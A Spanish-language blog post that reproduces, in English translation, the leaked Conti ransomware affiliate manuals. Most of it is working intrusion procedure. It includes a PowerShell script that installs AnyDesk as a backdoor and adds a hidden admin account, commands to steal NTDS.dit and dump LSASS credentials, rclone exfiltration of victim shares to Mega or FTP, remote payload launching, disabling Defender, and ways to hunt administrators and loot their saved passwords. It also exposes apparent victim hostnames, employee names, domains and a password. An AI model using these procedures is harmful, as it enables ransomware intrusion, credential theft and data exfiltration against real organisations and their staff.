Un vistazo al "kung fu" de Conti

Hace unos días un afiliado "descontento" de Conti, una de las bandas de RaaS (Ransomware-as-a-Service) más activas en los últimos tiempos, filtró en el foro XSS datos de la banda. 

A destacar el archivo "Мануали для работяг и софт.rar", que viene a ser algo como "Manuales para hard workers y software.rar".
Este archivo contiene 41 archivos de texto con instrucciones sobre cómo utilizar varias herramientas de hacking e incluso software legítimo durante una intrusión. Sin duda una gran oportunidad para descubrir como trabajan este tipo de actores y que, gracias a Darkfeed, los podemos encontrar traducidos al inglés:

Tools:

  • Rclone
  • ZeroLogon exploit
  • AnyDesk for exfiltration
  • RouterScan
  • Ngrok
  • Cobalt Stike
  • Kerberoasting Attacks
  • Metasploit
  • Proxifier

Scripts And Manuals:

  • Disable Av’s Scripts
  • Disable Windows Defender protections
  • Delete shadow copies
  • Active Directories Dumping
  • Privilege Escalation
  • Hacking into a Domain Controllers
  • Installing Metasploit on VPS
  • Metasploit commadns and use
  • How To Say Anonymous
  • How to know what info to download from a victim network
  • How to jump sessions using a payload
  • How to make sort of collected data

Files:

File Name: ad_users.txt

I’ll tell you another moment about ad_users, there is a lot of information about employees, there you can find techies, engineers, etc. We usually need ad_users when
we want to find the admin’s wheelbarrow, because on the admin’s wheelbarrows we can find flogs from the antivirus console,
from cloud backups, etc. Now I will throw off the manual for YUZERHUNTER, with the help of it, we find these cars. We also need ad_users
to get the SID from there for a golden ticket, but more on that later
1. make a list of targets
1.1 We open ad_users, we are looking for who we are potentially interested in: admin / engineer / inform technologists / IT
take account logins from sAMAccountName
1.2 We take a list of domain admins
1.3 put the first and second in the list.txt file

2. Load power view.
2.1 powershell-import _ / home / user / soft / powerview / view.ps1_
2.1 – comment: importing power view from /home/user/soft/powerview/view.ps1

2.3 Cutting in hunting
2.3.1
psinject 1884 x64 Invoke-UserHunter -Threads 20 -UserFile C: \ ProgramData \ list.txt >> C: \ ProgramData \ out.txt

instead of 1884 – the PID of the process where we have enough rights to make an injection.
x64 – or x86 bit of the process. see in the tasklist
In s \ programdata \ sheet.tht there should be a list that we did in point # 1.
in 5-10-20 minutes watch the result in out.tht. How does it end immediately replenishes it at once. that is, if the file is 0 bytes, it means that it works or the AV has burned (if you have burned it, then you will see it in the koba)

File Name: AnyDesk fix.txt

AnyDesk fix – familiarize everyone
Function AnyDesk {

mkdir “C:\ProgramData\AnyDesk”
# Download AnyDesk
$clnt = new-object System.Net.WebClient
$url = “http://download.anydesk.com/AnyDesk.exe”
$file = “C:\ProgramData\AnyDesk.exe”
$clnt.DownloadFile($url,$file)


cmd.exe /c C:\ProgramData\AnyDesk.exe –install C:\ProgramData\AnyDesk –start-with-win –silent


cmd.exe /c echo J9kzQ2Y0qO | C:\ProgramData\anydesk.exe –set-password


net user oldadministrator “qc69t4B#Z0kE3” /add
net localgroup Administrators oldadministrator /ADD
reg add “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist” /v oldadministrator /t REG_DWORD /d 0 /f

cmd.exe /c C:\ProgramData\AnyDesk.exe –get-id

}

AnyDesk

Executing the code in Powershell ISE Run As Admin
At the output, we get ID
We keep it to ourselves
Download Anydesk on a separate Dedicated Server \ VPS \ Virtual Machine and specify the ID
Click Console Account
Enter your password
Quote

J9kzQ2Y0qO

And then we log in as a local admin or domain account and use the charms of Anydesk
You can also download / upload to / from the victim’s machine, which is convenient in scanning and searching for documentation pointwise.

File Name: Changing the RDP port.txt

# add firewall rules
New-NetFirewallRule -DisplayName “New RDP Port 1350” -Direction Inbound -LocalPort 1350 -Protocol TCP -Action allow
New-NetFirewallRule -DisplayName “New RDP Port 1350” -Direction Inbound -LocalPort 1350 -Protocol UDP -Action allow
# add to registry new port
Set-ItemProperty -Path “HKLM:\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp” -Name PortNumber -Value 1350
# powershell
Restart-Service termservice -force

RDP port

File Name: DAMP NTDS.txt

Method of fingerless DAMP NTDS
shell wmic / node: “DC01” / user: “DOMAIN \ admin” / password: “cleartextpass” process call create “cmd / c vssadmin list shadows >> c: \ log.txt”


we make a request for listing shadow copies, there is an indication of the date, check that there is a fresh date
almost certainly they are already there, if not, then we do it ourselves

net start Volume Shadow Copy
shell wmic / node: “DC01” / user: “DOMAIN \ admin” / password: “cleartextpass” process call create “cmd / c vssadmin create shadow / for = C: 2> & 1”


further in the listing of shadow copies we find the freshest
Shadow Copy Volume: \\? \ GLOBALROOT \ Device \ HarddiskVolumeShadowCopy55
accordingly, we need a copy number for the next command


shell wmic / node: “DC01” / user: “DOMAIN \ admin” / password: “cleartextpass” process call create “cmd / c copy \\? \ GLOBALROOT \ Device \ HarddiskVolumeShadowCopy55 \ Windows \ NTDS \ NTDS.dit c: \ temp \ log \ & copy \\? \ GLOBALROOT \ Device \ HarddiskVolumeShadowCopy55 \ Windows \ System32 \ config \ SYSTEM c: \ temp \ log \ & copy \\? \ GLOBALROOT \ Device \ HarddiskVolumeShadowCopy55 \ Windows \ System32 \ config \ SECURITY c : \ temp \ log \ “

files ntds.dit / security / system should fall into c: \ temp \ log \
take a portable console 7z and pack it into an archive with a password
Code: [Select]

7za.exe a -tzip -mx5 \\ DC01 \ C $ \ temp \ log.zip \\ DC01 \ C $ \ temp \ log -pTOPSECRETPASSWORD


we download the password-protected archive for ourselves, if we get an error when decrypting the ntds file (the file is damaged), then we do the following


Esentutl / p C: \ log \ ntds.dit


the trick of this method is that in fact we don’t dump anything, we just take and pump out ntds
in order not to get burned by the fact that we are pulling out exactly ntds, we pack it into a password-protected archive

if you have troubles with something that is fired and thrown out of the network after an NTDS dump – try this method
it can only be burned by the very fact of some leaking date from the CD, and it is impossible to analyze what exactly you are dragging without knowing the password from the archive

File Name: DISABLING THE DEFENDER MANUALLY.txt

gpedit.msc
Inside, go along the path Computer Configuration – Administrative Templates – Windows Components – Windows Defender
we find the item “Protection in real time”:
There we select the item “Disable real-time protection” and click into it twice with the mouse button:
Then select the “Enabled” circle and click OK.

we always run everything from the Administrator:
uac – removes the pop-up window asking for permission to run from the admin
defoff – kill defender (does not work for everything, we check after the presence of the Mspeng process in taskmgr)
RDP – brings up port 3389
del – delete Shadow copy (asks for permission to delete, press – y)
NS – mount hidden system drives (pass: 98) !! use after AB demolition

NLA + BACK – fixes NLA + backdoor for login without password, works like this:
in the login window (where it asks to enter credits) – press win + Y the cmd window pops up
write taskmgr, open the users tab, right-click for any user – a connection
p.s – does not work on dozens \ requires a pass


ARCHIVE DISCONNECTING VARIOUS AUTPASSES: 9SealG

File Name: domains.txt

CLeichty
sd-cernst-vista
SDBUILD11
sd-books-01
sdt-xp-04
DEV-SPARE
MININT-N3JOUQL
SDBUILD10
sdmmarshall02
gary-x60
laptop07
gary-x61
cernstdesktop
pkomosin01
MININT-50C2BP7
DESKTOP-PC
SGRAY-PC
MattHLaptop
MattLauth-PC
jimbendt
laptop05
sdbuild13
nholli-laptop01
rthomp01
sdlaptop02
SDT-Vista-01
SDBuild19
GHARPST-LAPTOP
sdt-xp-01
dedds01
sdt-xp-02
SDT-WIN7X64-01
DKECK-OUTLOOK
vern-laptop
GHARPST01
mheidepriem
CWETHERILL2
PKOMOSINSKI01
GHARPST-X200
six-d9db82df276
jridge01
banderson02
SDT-Win8x64-01
SDT-XP-03
SD-EMailVerifier-01
russ-PC
bclark03
SDD-Win8x64-01
GMHII
casey-PC
GH-SURFACE
mheidepriem01
DKECK-WIN7
SDT-Win81x64-01
jbendt-01
dkeck-VM
sdt-vista-02
sdt-xp-05
VERN-THINK
SDT-WIN7X86-02
perload02
MLAUTH01
cernst-desktop
XPS
cernst01
PHARTMAN01
CASEY-D810
SGRAY-PC1
DellLatD830
mheidepriemDesk
DLOCKET01
dlockert
AutomatedTest
COREYL-DESKTOP
d410loaner
DKECK-DESKTOP
GH11
WIN-DSICSJFMGTJ
WIN-9CH5144SG63
NStrong
BLARK-E5530
CASEY-ASUS
Casey-Desktop
SDT-Win10x64-01
CWETHERILL
DESKTOP-T6363GF
GH-PC
MHeidepriem03
MHEIDEPRIEM02
SDT-Win10x64-02
SDBUILD-01
SDT-Win8x86-01
SDBUILD-02
SS-SLATE
Gary-Yoga
SDT-WIN7X86-01
BSI-PWD-01
LOANER
Wetherill
SurfacePro3
DESKTOP-K66L1AA
SDS-NKOMOSINSKI
blortied420
casey-laptop
Wetherill-Acer
SDBUILD-LAP1
davids-macbook
SDBUILD14
lenovocarbon
VSTRONG-LENOVO
SD-VERN-01
CaseyAcer
casey-dev
DKECK-WORK
dkeck-dev
6D-JHARPST-02
Cory-Asus
SIXD-TMACKE-L1
rmortensen1
6d-jharpst-01
CoreyL-Laptop
rmortensen
CoreyL-Dev

File Name: DUMP LSASS.txt

LSASS:
method via coba: (*** special thanks to @Sven)
! * 1) getsystem
2) shell rundll32.exe C: \ windows \ System32 \ comsvcs.dll, MiniDump PID C: \ ProgramData \ lsass.dmp full (we specify the pid from lsas)
(remove on a remote wheelbarrow) coba_wmic:
shell wmic / node: [target] process call create “cmd / c rundll32.exe C: \ windows \ System32 \ comsvcs.dll, MiniDump PID C: \ ProgramData \ lsass.dmp full”
remote-exec psexec [target] cmd / c rundll32.exe C: \ windows \ System32 \ comsvcs.dll, MiniDump PID C: \ ProgramData \ lsass.dmp full
=======
method via RDP:
open taskmgr => PKM po lsass process => create Dump file. \\ Next, download the file to your computer,

=======
how to unshack:
open the facial expression and further:
privilege :: debug
sekurlsa :: minidump A: \ 3.WORK \ BL-ws20 \ lsass.DMP (replace the path to our file)
log
sekurlsa :: logonpassword

File Name: ENVIRONMENT OF PRIVILEGES.txt

a stack of manuals on elevation of rights, who does not know English well, we translate here —> deepl.com

github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet#active-directory-exploitation-cheat-sheet

File Name: Gaining access to the server with Shadow Protect SPX (StorageCraft) backups.txt

Gaining access to the server with Shadow Protect SPX (StorageCraft) backups
==
1. We go via RDP to one of the servers, in my case it is a SQL server.
2. on the desktop we see the icon of the ShadowProtect SPX software
-> click on it
3.the gui opens (if it asks for credits, we enter those under which we entered the rdp, or any other YES)
4. On the left in the “Job Summary” block we see a detailed description of the backup scheme
in the “Name” field – the name of the backup of our server
in the field “Destination” – the place WHERE our spx adds backups, in the form NAME_BA_SERVAK (SHARA WITH BACKUP ON THIS SERVAK)
from our example, we can conclude that all backups are saved in a ball named StorageCraft, and the folders with server backups are named with the name of the server itself.
5. Knowing the name of the backup server, we want to get a better idea of ​​its structure, first of all we get the balls with the command “cmd.exe> ​​net view \\ COH-DSS3 / ALL”, in response we get “Error 5: Access Denied”
6. There is no access, we try to knock with other accounts YES – the answer is the same – error no 5, it would be logical to assume that in order to gain access to the server we need either the credits of the local administrator on this very server, or a special user account with dedicated rights
7.Suppose that if this is a dedicated user, then he has a name similar to the soft \ function:
we iterate over the logins with the occurrence of substrings (here we need to turn on imagination):
Storage
Shadow
Protect
Craft
SP
SPX
Backup
BUUser
ETC.
after which we do a search on ntds.dit (hashes.txt.ntds) to find a hash, in my case the search was successful and I found the user Humanity.local \ SPAdmin (I think it is clear here that this is Shadow Protect Admin) and his hash ce31b806821bec116ba03132ab5b3138, BUT unfortunately the search on cmd5.org did not give any result, and I desperately need a clearpass. (If you have enough hash, then congratulations – you have achieved the result)
8. But if you still need a clear pass or you could not find a suitable user, we will understand that if the software somehow knocks on the server, then the credits are known to it, which means they could remain on the server.
Trying to dump hashes
I will not describe in detail how to do this, but you should try hashdump (and its legitimate counterparts) and logonpasswords (and analogs)
In my case, I used a facial expression and dumped lsass, in which I found a clear pass from my SPAdmin account – kerberos:
* Username: SPAdmin
* Domain: COHBackup
* Password: Backup! User
(in my case, for some reason, the domain was not Humanity.local but COHBackup, although you can also knock with Humanity.local (replace with your value))
9. Go to the explorer, and open through it the necessary ball “\\ COH-DSS3 \ StorageCraft” asks me for credits, I enter COHBackup \ SPAdmin and Backup! User and successfully get access
10. Also, in some grids, there may be several backup servers, as an option to check this, this is to click on the Backup button in the upper left corner of the goo (right after File) then – Destinations -> and see what paths there are for saving backups
===

File Name: HOW AND WHAT INFU TO DOWNLOAD.txt

1) After we raised the rights, found the Admin Domain, we pull the sessions into cobalt
2) We put on the YES token and Remove the balls in this way:
* powershell-import – upload ShareFinder there as usual and give the following command –
psinject 7080 x64 Invoke-ShareFinder -CheckShareAccess -Verbose | Out-File -Encoding ascii C: \ ProgramData \ found_shares.txt

Next, we study the removed balls, we are interested in
* Finance docks
* Accounting
* Aichi
* Clients
* Projects
And so on, it all depends on what our target is doing.

Next, we do the following> here is the Manual from Diablo, all lego is accessible and understandable
after that we enter the mail address mega after he asks for his pass to enter or generate we choose our letter ‘Y’
the pass will not appear when inserted, however it is inserted there anyway
after creating the config, we are thrown into the main menu and we exit the clone.
then we enter this command rclone.exe config show it will show the config itself that we created
we copy it and create the rclone.conf file where we put this info.
after we found the balls we are interested in, we load the exe and the config on the target machine with the rights, we hide the config and the executable so that they are not found
go to the executable directory and give the command: shell rclone.exe copy “\\ envisionpharma.com \ IT \ KLSHARE” Mega: Finanse -q –ignore-existing –auto-confirm –multi-thread-streams 12 –transfers 12
where: \\ envisionpharma.com \ IT \ KLSHARE are balls
Mega: Finanse the location of the files in the mega (you can create a folder in the mega yourself, you just need to specify it here)
streams 12 –transfers 12 is the number of streams that pump to the maximum (12) I do not recommend as you can easily get burned


shell rclone.exe copy “\\PETERLENOVO.wist.local\Users” ftp1:uploads/Users/ -q –ignore-existing –auto-confirm –multi-thread-streams 3 –transfers 3 – here is an example in this case at FTP

!!! RKLON ITSELF WEIGHT OF THE ORDER 50MB, THE LINK TO IT WILL BE BELOW THE POST !!!

File Name: HOW TO DO PING (NETWORK).txt


++++++++++++++++++++++ HOW TO DO PING +++++++++++++++++++
1. CREATE A TXT FILE ON THE DESKTOP WITH THE NAME domains.txt
2. YOU HAVE A SORT OR JUST LOCAL NAMES OF COMPUTERS WE COLLECT THEM INTO THIS FILE
3. UPLOAD ON THE MACHINE (C: \ ProgramData \) WHICH WILL BE PINGED THE PING FILE domains.txt and p.bat
4. STARTING p.bat USING THE shell COMMAND
5. AFTER PING DOWNLOAD THE FILE res.txt

———————————– HOW QUICKLY TO GET A CLEAN SPEED FROM RUNNING MACHINES —– —————————–
1. YOU HAVE FILE res.txt, OPEN IT IN NOTEPAD ++
2.WEET CTRL + F INTO THE SEARCH LINE, ENTER TTL
3.HE FIND ALL IN CURRENT DOCUMENT YOU WILL APPEAR A WINDOW WITH SP
4. WE GO TO THE SITE en.toolpage.org/tool/ipv4-extractor THERE INSERT EVERYTHING THAT TURNED OUT AND GET A CLEAN PI


SITE FOR BRUTE OF SIMPLE HASHES

———–> hashes.com
========================

File Name: HOW TO JUMP SESSIONS USING A PAYLOAD.txt

Commands for starting the peloid to pull up the session to cobalt
1) shell SCHTASKS / s MS040926754153 / RU “SYSTEM” / create / tn “WindowsSensor15” / tr “cmd.exe / c C: \ ProgramData \ P32.exe” / sc ONCE / sd 01/01/1970 / st 00: 00
2) shell SCHTASKS / s MS040926754153 / run / TN “WindowsSensor15”
3) shell schtasks / S MS040926754153 / TN “WindowsSensor15” / DELETE / F
instead of
MS040926754153
insert
ipak cars
take turns pounding the commands
1) creating a task with a payload
2) cutting
3) deletion

We use it more often when launching VMIKOM
1) if it is DLL, then
shell wmic /node:192.168.104.13 process call create “rundll32.exe C: \ ProgramData \ x64.dll StartW”

Accordingly, where is the ip, we insert the ip of the machine to which we have access, then the path and name of our dll goes, I think the syntax is clear

If you are on the RDP> open CMD from the administrator and rundll32.exe C: \ ProgramData \ x64.dll, StartW you can specify any path according to where your dll is located


For EXE or .bat format, launch VMIKOM like this

shell wmic /node:10.28.0.3 process call create “C: \ ProgramData \ j1.exe”

 

You can also download and run through the metasploit, but now we rarely use launch and load using this tool, since it does not work correctly in the latest version

File Name: HOW TO MAKE SORT OF COLLECTED HELL !!!!.txt

How to sort the collected blood pressure from the network
1) Download FileZilla


2) Download Putty, run Putty through the torus

Let’s go here torproject.org/download/tor/

Download ATTENTION Expert Bundle

Unzip, go to the Tor directory and run tor.exe

In a few seconds it will reach 100% Done

In the Putty settings, go to the proxy, set soks5, ip 127.0.0.1 port 9050

3) We go through the filezilla to the server> go to the “Script” directory – put the AD files next to the script

4) Go to Putty, go to the server, go to the directory where the script is located, give the command
./script.sh

5) Done, go back to FilleZilla and pick up our sorted. After yourself, be sure to delete the AD files and the sorted folder, if the sorted folder is not deleted, just change it to any name

File Name: Hunting admins, please read, very useful !!.txt

“ Huntim admin.

And so, if we have servers \ USS \ tapes or cloud storages where backups are stored, but there is no access, then we need credits that only the admin has.
Accordingly, we need to hunt him. Usually in those networks where we work admins 1-2-3, no more.
People are divided into 3 types of positions:

Senior
Medium
Junior

Of course, we are interested in seniors, since they have more privileges / accesses (read passwords).


To begin with, I will write several options for how to determine the accounts of those very administrators who have passwords on board.

Part 1::
Option number 1:
Interrogating YES

“`

beacon> shell net group “domain admins” /domain

Tasked beacon to run: net group “domain admins” /domain
host called home, sent: 64 bytes
received output:


La demande sera traitée sur contrôleur de domaine du domaine DOMAIN.com.

Nom de groupe Domain Admins
Commentaire Designated administrators of the domain

Membres

——————————————————————————-
Administrator ClusterSvc createch
Createch2 d01adm da9adm
p01adm PMPUser q01adm
repl s01adm Sapserviced01
SAPServiceDA9 sapservicep01 SAPServiceQ01
sapservices01 SAPServiceSND SAPServiceSOL
services services2 sndadm
soladm somadm staseb
telnet Johnadm
La commande s’est terminée correctement.

“`

We look and see with our eyes filtering service accounts and non-service ones.
Service from the list above is for example
“,
SAPServiceDA9
services
telnet
servies2
Sapservice01

“`

Which accounts will most likely suit us:
“`staseb
Johnadm
“`
They were recorded.

We can see who they are in adfind_persons.txt

or through the command
“ ” shell net user staseb / domain
“,

See example:
“`

beacon> shell net user ebernardo /domain

Tasked beacon to run: net user ebernardo /domain
host called home, sent: 57 bytes
received output:


User name ebernardo
Full Name Eric Bernardo
Comment
User’s comment
Country/region code (null)
Account active Yes
Account expires Never

Password last set 2020-12-08 12:05:15 PM
Password expires 2021-06-06 12:05:15 PM
Password changeable 2020-12-08 12:05:15 PM
Password required Yes
User may change password Yes

Workstations allowed All
Logon script
User profile
Home directory
Last logon 2021-01-29 2:25:24 PM

Logon hours allowed All

Local Group Memberships *Administrators *Remote Desktop Users
*Server Operators
Global Group memberships *US Users *Great Plains Users
*Citrix Group *VPN Users Saskatoon
*Admins – AD Basic *VPNUsersHeadOffice
*Executives *All Winnipeg Staff
*Scribe Console Users *Domain Admins
*VPN Users USA *Workstation.admins
*Domain Users
The command completed successfully.

“`

We look at who he is – he is in a dozen groups, SOMETIMES in the Comment column they write who he is – engineer \ system administrator \ support \ business consultant.
in Last Logon, the account must be ACTIVE – that is, last logon today \ yesterday \ this week, but not a year ago or Never.
If it is not clear who this is after the survey, see adfind + check linkedin (section below).

So 2-3-5 uchetok as a result you get out of the domain of administrators and you question everyone and should have an idea of ​​who he is. As a result of 1-2-3 accounting, it turns out to find who can be an administrator.

Option number 2:
Turning into home analysts – watching Adfind.
We are interested in the adfind_groups file
We go in, we see a bunch of text
Press Ctrl + F (Notepad2 / Geany)
Introduce
,,, dn: CN =
“,
And the button Find All in current document.

at the output we get ABOUT the following (I cut out a piece and left 10-20 lines, usually there are from 100 to 10,000 lines)
“,

adfind_groups:3752: dn:CN=SQLServer2005SQLBrowserUser$TRUCAMTLDC,CN=Users,DC=domain,DC=com
adfind_groups:3775: dn:CN=clubsocial,CN=Users,DC=domain,DC=com
adfind_groups:3800: dn:CN=Signature Intl-Special,OU=Groupes,OU=Infra,DC=domain,DC=com
adfind_groups:3829: dn:CN=FIMSyncAdmins,CN=Users,DC=domain,DC=com
adfind_groups:3852: dn:CN=GRP-GRAPHISTE,OU=FG-GRP,DC=domain,DC=com
adfind_groups:3877: dn:CN=IT,CN=Users,DC=domain,DC=com
adfind_groups:3902: dn:CN=MSOL_AD_Sync_RichCoexistence,CN=Users,DC=domain,DC=com
adfind_groups:3925: dn:CN=WinRMRemoteWMIUsers__,CN=Users,DC=domain,DC=com
adfind_groups:3946: dn:CN=EDI,CN=Users,DC=domain,DC=com
adfind_groups:3967: dn:CN=Signature Canada,OU=Groupes,OU=Infra,DC=domain,DC=com
adfind_groups:4037: dn:CN=Signature USA,OU=Groupes,OU=Infra,DC=domain,DC=com

“`
And so, we have extracted the active directory groups.
What is interesting for us here and why we did it – in active directroy everything is structured and in USA EU networks everything is done as transparently as possible with comments, notes, copycards, etc.
We are interested in a group that deals with IT, administration, LAN engineering.
What was given to us after the search – we put it in a new notebook and do a search for the following key words:
“,
IT
Admin
engineer
—–
“,

In the example above, we find the following line
“,
adfind_groups:3877: dn:CN=IT,CN=Users,DC=domain,DC=com
“`

Go to line 3877 in adfind_Groups.txt and see the following:
“`

dn:CN=IT,CN=Users,DC=domain,DC=com
>objectClass: top
>objectClass: group
>cn: IT
>description: Informatique
>member: CN=MS Surface,OU=IT,DC=domain,DC=com
>member: CN=Gyslain Petit,OU=IT,DC=domain,DC=com
>member: CN=ftp,CN=Users,DC=domain,DC=com
>member: CN=St-Amand\, Sebastien\, CDT,OU=IT,DC=domain,DC=com
“`
We skip ftp and MS Surface users, but we take Gyslain Petit and St Amand Sebastien into circulation.
Next, open ad_users.txt
Introducing Gyslain Petit
We find a user with the following information:
“,
dn:CN=Gyslain Petit,OU=IT,DC=trudeaucorp,DC=com
>objectClass: top
>objectClass: person
>objectClass: organizationalPerson
>objectClass: user
>cn: Gyslain Petit
>sn: Petit
>title: Directeur, technologie de l’information
>physicalDeliveryOfficeName: 217
>givenName: Gyslain
>distinguishedName: CN=Gyslain Petit,OU=IT,DC=trudeaucorp,DC=com
>instanceType: 4
>whenCreated: 20020323153742.0Z
>whenChanged: 20201212071143.0Z
>displayName: Gyslain Petit
>uSNCreated: 29943
>memberOf: CN=GRP_Public_USA_P,OU=Securite-GRP,DC=trudeaucorp,DC=com
>memberOf: CN=GRP-LDAP-VPN,OU=FG-GRP,DC=trudeaucorp,DC=com
>memberOf: CN=IT Support,CN=Users,DC=trudeaucorp,DC=com
>memberOf: CN=Directeurs,CN=Users,DC=trudeaucorp,DC=com
>memberOf: CN=GRP-IT,OU=FG-GRP,DC=trudeaucorp,DC=com
>memberOf: CN=Signature Canada,OU=Groupes,OU=Infra,DC=trudeaucorp,DC=com
>memberOf: CN=EDI,CN=Users,DC=trudeaucorp,DC=com
>memberOf: CN=IT,CN=Users,DC=trudeaucorp,DC=com
>memberOf: CN=TRUDEAU-MONTREAL,CN=Users,DC=trudeaucorp,DC=com
>memberOf: CN=everyone,CN=Users,DC=trudeaucorp,DC=com
>uSNChanged: 6908986
>department: IT Manager
“`
We look at the title and who we have here? Director of Information Technology. It would seem like a bull’s-eye, but the director does not always have passwords, but the System Administrator does.
Therefore, we carry out similar manipulations for the second user and more. At home (= in the conf), we make notes of who is who and write down the logins from the adfind (sAMAccountname) like this:
“ ‘> sAMAccountName: gpetit
“,

“,
gpetit – Director of IT
staseb – such and such
“,


The second part of option # 2 (Simplified):
We look initially at adfind_users.txt
We do a search by
“ ‘title:
description
departament
“`
If you’re lucky, the posts will be directly written there. In my test case, it looks like this:

“,
adfind_persons:280: >title: Responsable, logistique direct import
adfind_persons:1836: >title: Chef des services techniques
adfind_persons:1955: >title: Chef comptable
adfind_persons:4544: >title: Directeur, technologie de l’information
adfind_persons:6064: >title: Présidente
adfind_persons:6191: >title: Chargée de projets, mise en marché
adfind_persons:6285: >title: Directrice marketing
adfind_persons:6848: >title: Coordonnatrice à la logistique
adfind_persons:6948: >title: Responsable de l’expedition
“`

Accordingly, we run our eyes and the accounts are found.


And so, these are easy methods. Consider alternative searches for admin accounts.
I know so far only 1 method of the simple ones – linkedin
We drive a request into Google
“,
NASHERTVA.COM linkedin
“,
instead of a domain – insert the domain of the office.

Go to Members
We do a search there by
“,
System
Admin
Engineer
Network
It
“`
If someone has a first name + last name, then we drive it into the advfind and the account is found.
If you know more effective methods – please write @rozetka

And so, part number 1 is over.

Getting started with admin hunt and inspection

Part # 2:
Huntim admin as standard via SharpView
SharpView.exe can be taken in the conference from your team leaders or from the software conference
The command for a hunt is as follows:
On Linux
“,
execute-assembly /home/user/soft/scripts/SharpView.exe Find-DomainUserLocation -UserIdentity gpetit
“,
On Windows>
“`
execute-assembly C:\Users\Андрей\Soft\Hacking\SharpView.exe Find-DomainUserLocation -UserIdentity gpetit
“`
where gpetit is the account of the person we’re looking for. what is written in adfinusers in sAMAccountname – we insert it here.

At the output, we get approximately the following log:

“,
UserDomain : domain
UserName : gpetit
ComputerName : DC01.domain.LOCAL
IPAddress : 172.16.1.3
SessionFrom : 192.168.100.55
SessionFromName :
LocalAdmin :

UserDomain : domain
UserName : gpetit
ComputerName : SQL01.domain.LOCAL
IPAddress : 172.16.1.30
SessionFrom : 192.168.100.55
SessionFromName :
LocalAdmin :

UserDomain : domain
UserName : gpetit
ComputerName : lptp-gpetit.domain.LOCAL
IPAddress : 172.16.1.40
SessionFrom : 192.168.100.55
SessionFromName :
LocalAdmin :

“`


And so, the log will be in an approximate format, how can we deal with it –
Firstly, how the software works – it asks where the user is currently at least somehow authorized. And our user is not simple – he is an administrator and at some point he can be authorized on 20-30-50 servers.
How can we filter and not get bogged down in this?
First, we remove the OS that are not interesting to us
for example, the first in the list DC01 is clearly DomainController01, you can check it by adfind_computers.txt or portscan 172.16.1.13 and see that it is a SERVER OS. And we need a client room.
The second one is SQL01 – DB OS. Doesn’t suit us.
Let’s look at the third one – lptp-gpetit. Hmm, our user is gpetit and lptp stands for laptop. Perhaps this is just him.
# It also happens that the admin is connected ONLY to the server OS, but in the SessionFrom column – an ip from another sabnet (for example, a VPN sabnet) where he sits quietly but SharpView did not “take” him – you can also take it into circulation.
Next is an IMPORTANT POINT.
First of all, beginners try to raise a session there and VERY OFTEN catch an alert. Alert from the admin = cutting out of the network, loss of time, nerves. This is NOT to be done!
What we’re going to do is poll it through the file system.
We do the following
“`shell net view \\172.16.1.40 /ALL
“`


На выходе видим его локальные дики
“`
C$
D$
“`
Обуваем токен(Рекомендуется именно токен, ибо pth оставляет несколько иной Event ID на домен контроллере, а это может заметить админ и выпилить нас)

Открываем File Manager в кобальте:
“`\\172.16.1.40\c$
“`

либо используем shell через
“`
shell dir \\172.16.1.40\c$“`

Смотрим что на диске C бегло
Переходим в папку
“`\\172.16.1.40\c$\Users\gpetit
“`
Na vykhode vidim yego lokal’nyye diki
“`
C$
D$
“`
Obuvayem token(Rekomenduyetsya imenno token, ibo pth ostavlyayet neskol’ko inoy Event ID na domen kontrollere, a eto mozhet zametit’ admin i vypilit’ nas)

Otkryvayem File Manager v kobal’te:
“`\\172.16.1.40\c$
“`

libo ispol’zuyem shell cherez
“`
shell dir \\172.16.1.40\c$“`

Smotrim chto na diske C beglo
Perekhodim v papku
“`\\172.16.1.40\c$\Users\gpetit
“`
At the exit we see his local wilds
“,
C $
D $
“,
We shoe the token (It is the token that is recommended, because pth leaves a slightly different Event ID on the domain controller, and this can be noticed by the admin and cut us out)

Open File Manager in cobalt:
“ `\\ 172.16.1.40 \ c $
“,

or use the shell via
“,
shell dir \\ 172.16.1.40 \ c $ “ ‘

We look at what is on the C drive fluently
Go to the folder
“ `\\ 172.16.1.40 \ c $ \ Users \ gpetit
“,

Usually, if it is REALLY the admin’s workstation, it has a lot of junk ala Virtualbox / putty / winscp etc. etc.

How can we “inspect” it, here is a list of interesting directories:

Desktop
“`\\172.16.1.40\c$\Users\gpetit\Desktop
“`
“`
\\172.16.1.40\c$\Users\gpetit\OneDrive
\\172.16.1.40\c$\Users\gpetit\Downloads
\\172.16.1.40\c$\Users\gpetit\Desktop
\\172.16.1.40\c$\Users\gpetit\Documents

“`
Here are folders with custom configurations, below is a list of what can be extracted:
“ `\\ 172.16.1.40 \ c $ \ Users \ gpetit \ AppData \ Local
“`

“`\\172.16.1.40\c$\Users\gpetit\AppData\Roaming
“`

“`
\\172.16.1.40\c$\Users\gpetit\AppData\Local\Google\Chrome\User Data\Default
“`
Here is the History && Login Data from chrome.
History can be directly downloaded and viewed using DBrowser for SQLite (nix win). What is useful is to see where the admin goes, who he votes for, you can sort the history by title and find a direct NAS / Tape / vSphere, etc. VERY useful thing.
Login Data – contains logins and passwords. Encrypted (!). If it weighs 38-42kb then there is EMPTY. If it weighs more than 40-45 kb (from 100 kb to 1-2 megabytes), it means there are EXACTLY passwords. If you have the required URL with the saved password, contact your team lead.
It also happens in chrome that there are no passwords in the Login Date, but if you carefully examine the profile folder, you will find an extenstions folder and there is a lastpass. This can also happen in practice – in this case, log in via RDP at night and export passwords (either a keylogger or other options)

Similarly, you can look at the Firefox / Edge folder (I will add the paths, googling easily)

Also, system administrators often have the following folders in AppData \ Roaming && AppData \ Local:
Keepass
LastPass
“,
there their configs. We drag them, put them in a confa. if you find such a thing, it means MOST OF ALL there is a mass of those MOST necessary passwords.

It also happens that the admin stores ala right on the desktop
“ ‘access.xlsx
passwords.docx
“`
We swing, break, watch.

there is also an outlook folder
“ `\\ 172.16.1.40 \ c $ \ Users \ gpetit \ AppData \ Local \ Microsoft \ Outlook
“,
Here is the file ala
“ `gpetit@domain.com – Exchange1.ost
“,
It contains the CORRESPONDENCE of this pepper. You can download it to yourself, open the free ost viewer and see the login / outcome mail. REGULARLY it is useful to sort out difficult situations with this particular technique.
Copied simply – cut outlook.exe, copy-paste the .ost file, then the user will open outlook for himself.
“`
\\172.16.1.40\c$\Users\gpetit\AppData\Local\Filezilla
\\172.16.1.40\c$\Users\gpetit\AppData\Roaming\Filezilla
“`
Here sitemanager.xml files can be with FTP SSH credentials. Downloading, watching, throwing in confu.


